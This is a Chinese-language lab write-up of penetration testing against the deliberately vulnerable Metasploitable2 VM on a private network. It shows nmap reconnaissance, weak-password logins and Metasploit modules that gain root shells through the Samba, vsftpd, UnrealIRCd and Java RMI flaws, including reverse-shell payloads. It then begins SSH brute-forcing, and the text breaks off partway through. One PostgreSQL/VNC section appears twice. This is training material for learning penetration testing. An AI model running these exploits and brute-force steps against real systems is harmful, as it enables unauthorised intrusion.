*Metasploitable2靶機滲透*
*Metasploitable2介紹*
? Metasploitable2 虛擬系統是一個特別制作的ubuntu作業系統,本身設計作為安全工具測驗和演示常見漏洞攻擊,版本2已經可以下載,并且比上一個版本包含更多可利用的安全漏洞,這個版本的虛擬系統兼容VMware,VirtualBox,和其他虛擬平臺,默認只開啟一個網路配接器并且開啟NAT和Host-only,本鏡像一定不要暴漏在一個易受攻擊的網路中,
*進行此次靶機練習的原因*
? 其中存在的的諸多漏洞中,年代也是比較久遠的,盡行這個實驗的目的就是通過自己搭建的靶機環境熟練滲透測驗的方法和流程,鞏固自己的滲透思路,因此,在這次實驗中會針對一個問題進行多工具多手段的操作,這并不是畫蛇添足,因為每個工具每種方法都有它的長處與弊端,不要過于依賴某個工具,這會使你在今后真正的滲透測驗中更加的自信,
*環境的配置*
攻擊機: kali linux ?ip:192.168.22.137 (ip根據個人電腦配置)
靶機?:Metasploitable2 ? 靶機ip:192.168.22.134 (ip根據個人電腦配置) 默認賬號/密碼msfadmin/msfadmin
注:Metasploitable2默認開機為普通用戶,不能修改IP地址,需要登錄root后才可以修改IP
root用戶及網路設定流程:
1、普通用戶登錄成功后,在命令列輸入sudo passwd 2、輸入兩次root密碼,出現successful字樣即可 3、命令列輸入su - root 切換到root用戶 4、編輯網卡設定vim /etc/network/interface
vim /etc/network/interface
#This file describes the......
#.....
#The primary nerwork interface
auto eth0
iface eth0 inet dhcp 本人采用的自動獲取IP
#iface eth0 inet static
#address 192.168. ....
#netmask 255.255.255.0
#gateway 192.168. ....
根據實際需要選擇動態或靜態網路
5、重啟網路 /etc/init.d/networking restart
下載鏈接::https://pan.baidu.com/s/1IRYfp-d_qQ9kfcsdK5PNWw
提取碼:rox3 ,解壓后可直接使用
實驗
使用nmap進行資訊收集
┌──(root💀kali)-[~]
└─# nmap -T4 -A -v 192.168.22.134
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-05 18:08 CST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Initiating ARP Ping Scan at 18:08
Scanning 192.168.22.134 [1 port]
Completed ARP Ping Scan at 18:08, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:08
Completed Parallel DNS resolution of 1 host. at 18:08, 0.03s elapsed
Initiating SYN Stealth Scan at 18:08
Scanning 192.168.22.134 [1000 ports]
Discovered open port 25/tcp on 192.168.22.134
Discovered open port 139/tcp on 192.168.22.134
Discovered open port 80/tcp on 192.168.22.134
Discovered open port 5900/tcp on 192.168.22.134
Discovered open port 21/tcp on 192.168.22.134
Discovered open port 22/tcp on 192.168.22.134
Discovered open port 3306/tcp on 192.168.22.134
Discovered open port 23/tcp on 192.168.22.134
Discovered open port 111/tcp on 192.168.22.134
Discovered open port 53/tcp on 192.168.22.134
Discovered open port 445/tcp on 192.168.22.134
Discovered open port 6667/tcp on 192.168.22.134
Discovered open port 1099/tcp on 192.168.22.134
Discovered open port 8180/tcp on 192.168.22.134
Discovered open port 2049/tcp on 192.168.22.134
Discovered open port 2121/tcp on 192.168.22.134
Discovered open port 5432/tcp on 192.168.22.134
Discovered open port 513/tcp on 192.168.22.134
Discovered open port 514/tcp on 192.168.22.134
Discovered open port 8009/tcp on 192.168.22.134
Discovered open port 6000/tcp on 192.168.22.134
Discovered open port 512/tcp on 192.168.22.134
Discovered open port 1524/tcp on 192.168.22.134
Completed SYN Stealth Scan at 18:08, 0.14s elapsed (1000 total ports)
Initiating Service scan at 18:08
Scanning 23 services on 192.168.22.134
Completed Service scan at 18:08, 11.05s elapsed (23 services on 1 host)
Initiating OS detection (try #1) against 192.168.22.134
NSE: Script scanning 192.168.22.134.
Initiating NSE at 18:08
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 18:08, 9.80s elapsed
Initiating NSE at 18:08
Completed NSE at 18:08, 0.51s elapsed
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Nmap scan report for 192.168.22.134
Host is up (0.00092s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.22.137
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: 2021-02-05T10:08:57+00:00; +14s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 40160/udp mountd
| 100005 1,2,3 44798/tcp mountd
| 100021 1,3,4 33803/udp nlockmgr
| 100021 1,3,4 40110/tcp nlockmgr
| 100024 1 39847/udp status
|_ 100024 1 53367/tcp status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info:
| Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 18
| Capabilities flags: 43564
| Some Capabilities: LongColumnFlag, Speaks41ProtocolNew, SupportsTransactions, SwitchToSSLAfterHandshake, Support41Auth, ConnectWithDatabase, SupportsCompression
| Status: Autocommit
|_ Salt: XE3nQ-*).Lry-pnYRmN|
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
|_ssl-date: 2021-02-05T10:08:57+00:00; +15s from scanner time.
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ VNC Authentication (2)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
| irc-info:
| users: 1
| servers: 1
| lusers: 1
| lservers: 0
| server: irc.Metasploitable.LAN
| version: Unreal3.2.8.1. irc.Metasploitable.LAN
| uptime: 0 days, 3:59:11
| source ident: nmap
| source host: 82B328E6.3BA08CB1.FFFA6D49.IP
|_ error: Closing Link: livdnmifj[192.168.22.137] (Quit: livdnmifj)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 00:0C:29:DD:32:05 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.163 days (since Fri Feb 5 14:13:30 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=208 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h15m14s, deviation: 2h30m00s, median: 13s
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| METASPLOITABLE<00> Flags: <unique><active>
| METASPLOITABLE<03> Flags: <unique><active>
| METASPLOITABLE<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: metasploitable
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: metasploitable.localdomain
|_ System time: 2021-02-05T05:08:48-05:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.92 ms 192.168.22.134
NSE: Script Post-scanning.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Initiating NSE at 18:08
Completed NSE at 18:08, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.98 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.430KB)
弱口令漏洞
原理:系統或者資料庫的登陸用戶,密碼簡單或者用戶名相同,容易通過暴力破解的手段來獲取密 碼,
影響范圍:所有使用用戶名/密碼登陸的系統和軟體都有可能存在此問題
1、系統弱口令漏洞——22埠開放(22埠:SSH遠程登錄協議)
在kali中輸入telnet 192.168.22.134 login/password:msfadmin/msfadmin
此實驗需要事前安裝telnet,安裝步驟如下
┌──(root💀kali)-[~]
└─# apt-get install telnetd
正在讀取軟體包串列... 完成
正在分析軟體包的依賴關系樹
正在讀取狀態資訊... 完成
下列【新】軟體包將被安裝:
telnetd
升級了 0 個軟體包,新安裝了 1 個軟體包,要卸載 0 個軟體包,有 1257 個軟體包未被升級,
需要下載 44.9 kB 的歸檔,
......
......
┌──(root💀kali)-[~]
└─# apt-get install xinetd 100 ?
正在讀取軟體包串列... 完成
正在分析軟體包的依賴關系樹
正在讀取狀態資訊... 完成
下列軟體包是自動安裝的并且現在不需要了:
tcpd
使用'apt autoremove'來卸載它(它們),
下列軟體包將被【卸載】:
inetutils-inetd
下列【新】軟體包將被安裝:
......
......
┌──(root💀kali)-[~]
└─# vim /etc/inetd.conf
...
#daytime stream tcp6 nowait root internal
#time stream tcp6 nowait root internal
#:STANDARD: These are standard services.
安裝完畢后,系統會在/etc/inetd.conf加上這行資訊,如果沒有手動添加
telnet stream tcp nowait telnetd /usr/sbin/tcpd /usr/sbin/in.telnetd
#:BSD: Shell, login, exec and talk are BSD protocols.
...
┌──(root💀kali)-[~]
└─# vim /etc/xinetd.d/telnet 系統中并沒有這個檔案,編輯自動生成即可
# default: on
# description: The telnet server serves telnet sessions; it uses /
# unencrypted username/password pairs for authentication.
service telnet
{
disable = no
flags = REUSE
socket_type = stream
wait = no
user = root
server = /usr/sbin/in.telnetd
server_args = -h
log_on_failure += USERID
}
┌root💀kali)-[~]
└─# /etc/init.d/xinetd restart
Restarting xinetd (via systemctl): xinetd.service.
┌──(root💀kali)-[~]
└─# apt-get install telnet
正在讀取軟體包串列... 完成
正在分析軟體包的依賴關系樹
正在讀取狀態資訊... 完成
下列軟體包是自動安裝的并
...
...
安裝完成,可以進行實驗了
┌──(root💀kali)-[~]
└─# telnet 192.168.22.134
Trying 192.168.22.134...
Connected to 192.168.22.134.
Escape character is '^]'.
_ _ _ _ _ _ ____
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
|_|
Warning: Never expose this VM to an untrusted network!
Contact: msfdev[at]metasploit.com
Login with msfadmin/msfadmin to get started
metasploitable login: msfadmin
Password:
Last login: Fri Feb 5 01:39:28 EST 2021 from 192.168.22.129 on pts/1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
msfadmin@metasploitable:~$
msfadmin@metasploitable:~$ pwd
/home/msfadmin
成功登錄遠程靶機
2、MySQL弱密碼登錄——3306埠開放(3306埠:MySQL開放此埠)
┌──(root💀kali)-[~]
└─# mysql -h 192.168.22.134
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 26
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> show databases
-> ;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+--------------------+
7 rows in set (0.001 sec)
MySQL [(none)]>
成功登錄對方MySQL資料庫
3、PostgreSQL弱密碼登錄——埠5432開放(5432埠:PostgreSQL資料庫)
┌──(root💀kali)-[~]
└─# psql -h 192.168.22.134 -U postgres 2 ?
用戶 postgres 的口令:postgres
psql (13.0 (Debian 13.0-4), 服務器 8.3.1)
輸入 "help" 來獲取幫助資訊.
postgres=#
使用\q 退出.
postgres-# \q
成功登錄對方PostgreSQL資料庫
4、VNC弱密碼登錄——埠5900開放(5900埠:虛擬網路計算機顯示0;5901–1;5902–2;5903–3)
┌──(root💀kali)-[~]
└─# vncviewer 192.168.22.134
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password: 密碼為password
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:
32 bits per pixel.
...
...
postgres=#
使用\q 退出.
postgres-# \q
成功登錄對方PostgreSQL資料庫
4、VNC弱密碼登錄——埠5900開放(5900埠:虛擬網路計算機顯示0;5901–1;5902–2;5903–3)
┌──(root💀kali)-[~]
└─# vncviewer 192.168.22.134
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password: 密碼為password
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:
32 bits per pixel.
...
...
5、FTP弱口令登錄
使用kali自帶的爆破工具(hydra)進行爆破一下
6、Samba MS-RPC Shell命令注入漏洞
漏洞產生原因:傳遞通過MS-RPC提供的未過濾的用戶輸入在呼叫定義的外部腳本時呼叫/bin/sh,在smb.conf中,導致允許遠程命令執行,
影響的系統/軟體:
Xerox WorkCentre Pro
Xerox WorkCentre
VMWare ESX Server
Turbolinux Server/Personal/Multimedia/Home/Desktop/Appliance/FUJI
Trustix Secure Linux
SUSE Linux Enterprise
Sun Solaris
Slackware Linux
RedHat Enterprise
Mandriva Linux
啟動Metasploit
┌──(root💀kali)-[~]
└─# msfconsole
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v6.0.15-dev ]
+ -- --=[ 2071 exploits - 1123 auxiliary - 352 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Use the edit command to open the currently active module in your editor
搜索有關samba漏洞的代碼庫 search samba
msf6 > search samba
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/samba_symlink_traversal normal No Samba Symlink Directory Traversal
...
...
12 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
13 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
14 exploit/osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
...
...
使用usermap_script代碼 use exploit/multi/samba/usermap_script
msf6 > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
查看攻擊載荷 show payloads 并選擇bind_netcat即使用netcat工具在滲透攻擊成功后執行shell并通過netcat系結在一個監聽埠上
msf6 exploit(multi/samba/usermap_script) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK)
1 cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd)
2 cmd/unix/bind_inetd normal No Unix Command Shell, Bind TCP (inetd)
3 cmd/unix/bind_jjs normal No Unix Command Shell, Bind TCP (via jjs)
4 cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua)
5 cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat)
6 cmd/unix/bind_netcat_gaping
...
...
msf6 exploit(multi/samba/usermap_script) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
查看引數配置 show options 設定目標ip、port等引數 set RHOST 192.168.22.134
msf6 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/bind_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(multi/samba/usermap_script) > set rhost 192.168.22.134
rhost => 192.168.22.134
執行exploit/run獲得shell
msf6 exploit(multi/samba/usermap_script) > run
[*] Started bind TCP handler against 192.168.22.134:4444
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.22.134:4444) at 2021-02-06 11:50:12 +0800
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
......
7、Vsftpd原始碼包含后門漏洞——開放著21埠,并且vsftpd版本號為2.3.4
原理: 在特定版本的vsftpd服務器程式中,被人惡意植入代碼,當用戶名以“: )”結尾時,服務器就會在6200埠監聽,并且能夠執行任意代碼
影響軟體:Vsftpd server v2.3.4
啟動Metsploit 搜索關于Vsftpd的了漏洞代碼庫 search vsftpd
msf6 > search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
使用代碼 use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
查看需要設定的引數 show options 設定個目標IP即可, set RHOST 192.168.22.134
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.22.134
rhosts => 192.168.22.134
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.22.134:21 - The port used by the backdoor bind listener is already open
[+] 192.168.22.134:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (0.0.0.0:0 -> 192.168.22.134:6200) at 2021-02-06 12:09:20 +0800
whoami
root
成功拿下對方shell
8、UnreallRCd后門漏洞
原理: 在2009年11月到2010年6月間分布于某些鏡面站點的UnreallRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的惡意代碼,遠程攻擊者能夠執行任意代碼,
影響系統/軟體:Unreal UnreallRCd3.2.8.1
在終端中輸入命令“search unreal ircd”,搜索ircd的相關工具和攻擊載荷,
msf6 > search unreal ircd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution
在終端中輸入命令“use exploit/unix/irc/unre ircd 3281backdoor”,啟用漏洞利用模塊,
msf6 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) >
在終端中輸入命令“show options",查看需要設定的相關項,“yes” 表示必須填寫的引數,
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 6667 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic Target
接下來在終端中輸入命令“set RHOST 【靶機ip】”,設定目標主機的IP地址
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 192.168.22.134
rhosts => 192.168.22.134
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[-] 192.168.22.134:6667 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
此處提示沒有選擇payload,手動設定payload
設定payload及lhost(攻擊端IP)
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost 192.168.22.137
lhost => 192.168.22.137
執行攻擊exploit/run
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP handler on 192.168.22.137:4444
[*] 192.168.22.134:6667 - Connected to 192.168.22.134:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.22.134:6667 - Sending backdoor command...
[*] Command shell session 1 opened (192.168.22.137:4444 -> 192.168.22.134:59370) at 2021-02-06 12:32:48 +0800
whoami
root
ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:dd:32:05
inet addr:192.168.22.134 Bcast:192.168.22.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fedd:3205/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500
......
9、Java RMI SERVER命令執行漏洞——1099埠開放
啟動metasploit 在終端中輸入命令“search java_rmi_server”,搜索RMI的相關工具和攻擊載荷,
msf6 > search java_rmi_server
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/misc/java_rmi_server 2011-10-15 normal No Java RMI Server Insecure Endpoint Code Execution Scanner
1 exploit/multi/misc/java_rmi_server 2011-10-15 excellent Yes Java RMI Server Insecure Default Configuration Java Code Execution
Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/misc/java_rmi_server
在終端中輸入命令“use exploit/multi/misc/java_rmi_server”,啟用漏洞利用模塊, 提示符就會提示進入到該路徑下,
msf6 > use exploit/multi/misc/java_rmi_server
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
在終端中輸入命令“show options”,查看需要設定的相關項,“yes”表示必須填寫的引數,
msf6 exploit(multi/misc/java_rmi_server) > show options
Module options (exploit/multi/misc/java_rmi_server):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 yes Time that the HTTP Server will wait for the payload request
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 1099 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.22.137 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
在終端中輸入命令“set RHOST 192.168.22.134”,設定目標主機的IP地址,
msf6 exploit(multi/misc/java_rmi_server) > set rhosts 192.168.22.134
rhosts => 192.168.22.134
在終端中輸入“exploit”, 實施攻擊,攻擊成功后,建立連接會話,
msf6 exploit(multi/misc/java_rmi_server) > run
[*] Started reverse TCP handler on 192.168.22.137:4444
[*] 192.168.22.134:1099 - Using URL: http://0.0.0.0:8080/hwZJA66Q
[*] 192.168.22.134:1099 - Local IP: http://192.168.22.137:8080/hwZJA66Q
[*] 192.168.22.134:1099 - Server started.
[*] 192.168.22.134:1099 - Sending RMI Header...
[*] 192.168.22.134:1099 - Sending RMI Call...
[*] 192.168.22.134:1099 - Replied to request for payload JAR
[*] Sending stage (58125 bytes) to 192.168.22.134
[*] Meterpreter session 2 opened (192.168.22.137:4444 -> 192.168.22.134:50234) at 2021-02-06 12:55:37 +0800
[*] 192.168.22.134:1099 - Server stopped.
meterpreter > ls
Listing: /
==========
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40666/rw-rw-rw- 4096 dir 2012-05-14 11:35:33 +0800 bin
40666/rw-rw-rw- 1024 dir 2012-05-14 11:36:28 +0800 boot
......
meterpreter > ifconfig
Interface 1
============
Name : lo - lo
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ::
Interface 2
============
Name : eth0 - eth0
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 192.168.22.134
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::20c:29ff:fedd:3205
IPv6 Netmask : ::
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.22.134 - Meterpreter session 2 closed. Reason: User exit
10、Tomcat 管理臺默認口令漏洞——開放8180埠并且運行著ApacheTomcat/CoyoteJSP engine1.1
原理: Tomcat管理臺安裝好后需要及時修改默認管理賬戶,并杜絕弱口令,成功登陸者可以部署任意web應用,包括webshell,
影響系統/軟體:Tomcat
1、訪問192.168.22.134:8180,選擇Tomcat Manager
2、后面需要上傳木馬拿webshell,俺還不會用,等研究會了再繼續
11、Root用戶弱口令漏洞(SSH爆破)——開啟著22埠ssh服務
啟動MSF終端,在終端中輸入命令“search ssh_login”,搜索ssh_login的相關工具和攻擊載荷,
msf6 > search ssh_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ssh/ssh_login normal No SSH Login Check Scanner
1 auxiliary/scanner/ssh/ssh_login_pubkey normal No SSH Public Key Login Scanner
在終端中輸入命令“use auxiliary/scanner/ssh/ssh_login”,啟用漏洞利用模塊, 提示符就會提示進入到該路徑下,
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) >
在終端中輸入命令“show options”,查看需要設定的相關項,“yes”表示必須填寫的引數,
msf6 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
在終端中輸入命令“set RHOST 192.168.22.134”,設定目標主機的IP地址,
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.22.134
rhosts => 192.168.22.134
在終端中輸入“set USERNAME root”,指定登陸用戶名root,
msf6 auxiliary(scanner/ssh/ssh_login) > set username root
username => root
在終端中輸入“set PASS_FILE ”,設定暴力破解的密碼檔案路徑,
